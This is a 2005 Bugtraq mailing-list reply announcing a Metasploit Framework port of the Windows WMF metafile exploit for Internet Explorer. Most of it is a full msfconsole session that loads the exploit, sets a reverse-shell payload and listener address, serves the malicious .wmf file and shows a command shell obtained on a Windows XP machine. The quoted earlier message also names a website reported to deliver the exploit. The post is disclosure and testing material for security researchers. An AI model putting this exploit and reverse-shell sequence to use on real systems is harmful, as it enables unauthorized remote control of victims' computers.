[41846] in bugtraq
Re: Is this a new exploit?
daemon@ATHENA.MIT.EDU (H D Moore)
Wed Dec 28 14:02:19 2005
From: H D Moore <sflist@digitaloffense.net>
To: bugtraq@securityfocus.com
Date: Tue, 27 Dec 2005 21:34:51 -0600
In-Reply-To: <20051227202014.7446.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-6"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200512272134.51620.sflist@digitaloffense.net>
I ported the exploit to the Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps...
Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:
--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz
Tested on Win XP SP1 and SP2.
-HD
+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]
msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\XXXX\Desktop>
On Tuesday 27 December 2005 14:20, noemailpls@noemail.ziper wrote:
> Warning the following URL successfully exploited a fully patched
> windows xp system with a freshly updated norton anti virus.
>
> unionseek.com/d/t1/wmf_exp.htm
>
> The url runs a .wmf and executes the virus, f-secure will pick up the
> virus norton will not.
